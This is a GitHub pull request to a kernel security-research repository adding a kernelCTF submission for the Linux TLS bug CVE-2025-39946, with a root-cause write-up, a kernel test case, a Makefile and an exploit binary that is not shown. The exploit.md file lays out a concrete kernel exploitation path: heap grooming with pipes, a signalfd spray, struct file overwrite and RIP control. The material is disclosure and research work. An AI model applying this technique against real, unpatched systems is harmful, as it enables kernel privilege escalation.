-
Notifications
You must be signed in to change notification settings - Fork 511
Add kernelCTF CVE-2025-39946 mitigation #295
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
liona24
wants to merge
2
commits into
google:master
Choose a base branch
from
liona24:CVE-2025-39946
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Changes from all commits
Commits
Show all changes
2 commits
Select commit
Hold shift + click to select a range
File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
143 changes: 143 additions & 0 deletions
143
pocs/linux/kernelctf/CVE-2025-39946_mitigation/docs/exploit.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,143 @@ | ||
| # CVE-2025-39946 | ||
|
|
||
| Exploit documentation for `CVE-2025-39946` against `mitigation-v3b-6.1.55`. | ||
|
|
||
| As stated in the `vulnerability.md` documentation, the bug behind | ||
| `CVE-2025-39946` causes use of uninitialized data and potentially out-of-bounds | ||
| accesses. For exploitation we will focus on the uninitialized data in the | ||
| `struct skb_shared_info.frags[]` array. | ||
| TLS manages the first 5 fragments for internal use, however fragments after that | ||
| are accessible to us because of the bug described. | ||
| In order to exploit this, we will first groom the heap so that the next fragment | ||
| has some controlled value. We then try to re-use this fragment page so that we | ||
| can trigger a page write corrupting kernel data. | ||
|
|
||
| ## Page Write Targets | ||
|
|
||
| With the primitive outlined above (essentially a one-shot use-after-free page | ||
| write primitive), we need to find a useful page to write to. | ||
| There are two obvious choices for this: | ||
| - Page tables | ||
| - Slab backing pages | ||
|
|
||
| At the time of working on the exploit, page tables seemed to be too unstable due | ||
| to the one-shot nature of the write, which is why we will continue with the slab | ||
| backing pages. In hindsight, page tables were probably a good fit too. | ||
|
|
||
| Which slab do we target? Ideally the slab would contain objects that allow | ||
| trivial code execution or other memory write primitives. Additionally the | ||
| objects for the slab should be allocatable without too much noise in other | ||
| slabs, because we do not want to accidently corrupt another slab. | ||
| Finally, we need to ensure that the same pages used for the slab can be allocated | ||
| for for skb fragments. | ||
|
|
||
| Considering all of the above, I went for `struct file` objects: | ||
| - They can be allocated rather easily by opening files and we can allocate quite | ||
| many | ||
| - Files are allocated from a dedicated `kmem_cache`, thus we are sure to only | ||
| corrupt file objects aiding stability. | ||
| - Files contain a `f_op` vtable, allowing direct rip control. | ||
| - File slabs are backed by order 0 pages, which can be allocated easily from | ||
| userspace using pipes. | ||
|
|
||
| One downside of files is the fact that we cannot allocate files without | ||
| allocating inodes too. This is a problem because every file allocation will | ||
| result in the allocation of a `struct dentry` which essentially means our page | ||
| write might accidently hit a different slab. | ||
|
|
||
| ## Heap Grooming | ||
|
|
||
| In order to get a fragment at the right position we want to have skbs with 6 | ||
| fragments, so that the last fragment can be picked up by the file slab. | ||
| To get the controlled fragments into an skb, we create pipes and fill exactly 5 | ||
| pages. Pipe buffers are backed by order 0 pages which matches the file slab | ||
| `kmem_cache` order. After that we add another partially filled page which will | ||
| be the page used for triggering the overwrite. | ||
| We then splice those pages onto an skb for the expected fragment layout. | ||
|
|
||
| The final page needs to be partially filled so that there is some space left to | ||
| write. We will fill the page exactly to the alignment of the `struct file` | ||
| objects in the slab. Thus the next write starts at the next `struct file` | ||
| object, and will corrupt all the files in the rest of the slab. | ||
|
|
||
| For increased chance of hitting the right pages, we will repeat the above for | ||
| N (= 16) pipes. We fill all of them and then release the skbs one by one, | ||
| immediatly picking each up with a new `struct tls_strparser`. Since the last | ||
| freed object will be the first on the freelist, it is very likely that the TLS | ||
| socket picks up the prepared skb. | ||
|
|
||
| ## File Slab Spray | ||
|
|
||
| Now that each TLS socket is readily equipped with a prepared skb, we want to | ||
| spray file slabs so that new slabs will pick up pages that were released from | ||
| the pipe buffers earlier. | ||
| For files to allocate we will choose `signalfd`s. Those are a decent choice | ||
| because they are rather simple with a small sized context such that we do not | ||
| allocate new slabs except for the `file` and the `dentry` slab. Furthermore | ||
| `signalfd`s provide an easy to use oracle ([1]) allowing us to check whether we | ||
| corrupted the file structure. | ||
|
|
||
| ```c | ||
| static int do_signalfd4(int ufd, sigset_t *mask, int flags) | ||
| { | ||
| struct signalfd_ctx *ctx; | ||
|
|
||
| /* ... */ | ||
|
|
||
| if (ufd == -1) { | ||
| /* ... */ | ||
| } else { | ||
| struct fd f = fdget(ufd); | ||
| if (!f.file) | ||
| return -EBADF; | ||
| ctx = f.file->private_data; | ||
| if (f.file->f_op != &signalfd_fops) { // [1] | ||
| fdput(f); | ||
| return -EINVAL; | ||
| } | ||
| /* ... */ | ||
| } | ||
| ``` | ||
|
|
||
| As mentioned earlier we cannot prevent allocation of `dentry` slabs when | ||
| allocating `signalfd`s. To prevent kernel panics because of corrupted `dentry`s | ||
| we will spray the `signalfd`s in a dedicated forked process which will live | ||
| forever in case we fail to find a corrupted file. This way we prevent any | ||
| accidental oops during cleanup. | ||
|
|
||
| ## Triggering the Bug for the Page Write | ||
|
|
||
| Now that we hopefully have a `signalfd` with a file in a slab backed by the page | ||
| we placed into one of the skb fragments, we will trigger the bug as described in | ||
| the `vulnerability.md` document and write our payload for each skb set up. | ||
|
|
||
| For payload choice we will opt for a simple empty file that basically has | ||
| nothing but an `f_op` table that has a `flush` method populated and a reference | ||
| count of 1. When we close the file via `close()` we will reach `filp_close()` | ||
| which gives us RIP control. | ||
| We do not really need the reference count of exactly 1, we just need anything | ||
| greater than zero to bypass checks in `filp_close()`. Actually it is better to | ||
| choose a greater reference count to prevent the file destructor from running. | ||
| Since we will block the kernel in an infinite loop in our flush primitive, we do | ||
| not need to worry about that too much though. | ||
|
|
||
| As a RIP gadget we will utilize the "one gadget" technique described in great | ||
| detail in the [CVE-2025-21700 writeup](https://raw.githubusercontent.com/google/security-research/refs/heads/master/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md). | ||
| Also note that this gadget does not need a KASLR bypass. | ||
|
|
||
| To create the `struct file_operations` pointer we will resort to the previously | ||
| documented deterministically known location of the exception stacks in the CPU | ||
| entry area. This issue has been documented several times (CVE-2023-0597). | ||
|
|
||
| After each write completed, we check each `signalfd` using the oracle described | ||
| above. If any of them got corrupted we trigger our payload by closing the file | ||
| descriptor. | ||
|
|
||
| ## Stability Notes | ||
|
|
||
| Special care was taken to make the exploit repeatible if the page reclaim fails. | ||
| It should be close to 80% stable. | ||
| As a side note, the usage of the "one gadget" actually helps with the page | ||
| reclaim because it causes the PCP to drain, thus giving us more reliability in | ||
| the page allocation. | ||
|
|
||
77 changes: 77 additions & 0 deletions
77
pocs/linux/kernelctf/CVE-2025-39946_mitigation/docs/vulnerability.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,77 @@ | ||
| # CVE-2025-39946 | ||
|
|
||
| - Requirements: | ||
| - Kernel configuration CONFIG_TLS | ||
| - Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84c61fe1a75b4255df1e1e7c054c9e6d048da417 | ||
| - Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0aeb54ac4cd5cf8f60131b4d9ec0b6dc9c27b20d | ||
| - Affected Versions: 6.0-rc1 - 6.17-rc7 | ||
| - URL: https://www.cve.org/CVERecord?id=CVE-2025-39946 | ||
|
|
||
| In the kernel TLS implementation an issue was found when processing invalid | ||
| TLS records under network pressure. This behavior can be achieved | ||
| deterministically by forcing short reads via out-of-band data. The kernel | ||
| test case demonstrates this: | ||
|
|
||
| ```c | ||
| TEST_F(tls_err, oob_pressure) | ||
| { | ||
| char buf[1<<16]; | ||
| int i; | ||
|
|
||
| memrnd(buf, sizeof(buf)); | ||
|
|
||
| EXPECT_EQ(send(self->fd2, buf, 5, MSG_OOB), 5); | ||
| EXPECT_EQ(send(self->fd2, buf, sizeof(buf), 0), sizeof(buf)); | ||
| for (i = 0; i < 64; i++) | ||
| EXPECT_EQ(send(self->fd2, buf, 5, MSG_OOB), 5); | ||
| } | ||
| ``` | ||
|
|
||
| The problem manifests in the `tls_strp_copyin_frag` method. After entering | ||
| copy mode due to the initial short read (which is not large enough for parsing | ||
| the tls message size just yet) and partially receiving the large buffer, we | ||
| continue to copy out chunks from said large buffer. Problem is that TLS | ||
| pre-allocated the `skb_shinfo->frags` for only a fixed (small) TLS record and | ||
| fails to check whether the available fragments are already exhausted ([1]). | ||
| It then continues to copy the incoming data ([2]) regardless. | ||
| Finally, parsing the TLS header in `tls_rx_msg_size` is made to fail | ||
| returning an invalid size. This causes the copy loop to abort ([3]), however | ||
| will not abort the full message (lower layer TCP receive is not interrupted). | ||
| A following read triggered by other incoming OOB messages forces reentry into | ||
| `tls_strp_copyin_frag` eventually exhausting the available fragments initialized | ||
| causing reads of uninitialized data or out-of-bounds reads after the | ||
| `skb_shared_info` structure. | ||
| Since fragments are basically raw pages, this indirectly yields a page write | ||
| primitive via uninitialized fragments ([2]) or potentially crafted out-of-bounds | ||
| fragments. | ||
|
|
||
| ```c | ||
| static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb, | ||
| struct sk_buff *in_skb, unsigned int offset, | ||
| size_t in_len) | ||
| { | ||
| size_t len, chunk; | ||
| skb_frag_t *frag; | ||
| int sz; | ||
|
|
||
| frag = &skb_shinfo(skb)->frags[skb->len / PAGE_SIZE]; // [1] | ||
|
|
||
| len = in_len; | ||
| /* First make sure we got the header */ | ||
| if (!strp->stm.full_len) { | ||
| /* Assume one page is more than enough for headers */ | ||
| chunk = min_t(size_t, len, PAGE_SIZE - skb_frag_size(frag)); | ||
| WARN_ON_ONCE(skb_copy_bits(in_skb, offset, | ||
| skb_frag_address(frag) + | ||
| skb_frag_size(frag), | ||
| chunk)); // [2] | ||
|
|
||
| skb->len += chunk; | ||
| skb->data_len += chunk; | ||
| skb_frag_size_add(frag, chunk); | ||
|
|
||
| sz = tls_rx_msg_size(strp, skb); | ||
| if (sz < 0) | ||
| return sz; // [3] | ||
| /*...*/ | ||
| ``` |
15 changes: 15 additions & 0 deletions
15
pocs/linux/kernelctf/CVE-2025-39946_mitigation/exploit/mitigation-v3b-6.1.55/Makefile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,15 @@ | ||
| SRC := exploit.c | ||
|
|
||
| exploit: $(SRC) | ||
| $(CC) -O2 -static -s -Wall -o $@ $^ | ||
|
|
||
| exploit_debug: $(SRC) | ||
| $(CC) -O2 -static -ggdb -Wall -o $@ $^ | ||
|
|
||
| rip: rip.c | ||
| # needs clang to compile | ||
| clang -O3 -o $@ $< | ||
|
|
||
| # apparently this is needed for the CI | ||
| prerequisites: | ||
|
|
Binary file added
BIN
+928 KB
pocs/linux/kernelctf/CVE-2025-39946_mitigation/exploit/mitigation-v3b-6.1.55/exploit
Binary file not shown.
Oops, something went wrong.
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can you explain how this works?
vulnerability.mdsays that you have an OOB read of uninitialized data. How do we go from that to an out-of-bounds write?There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I added more details about the vuln in
vulnerability.md. Please see if this info is enough. Also note the exploit comments regarding this.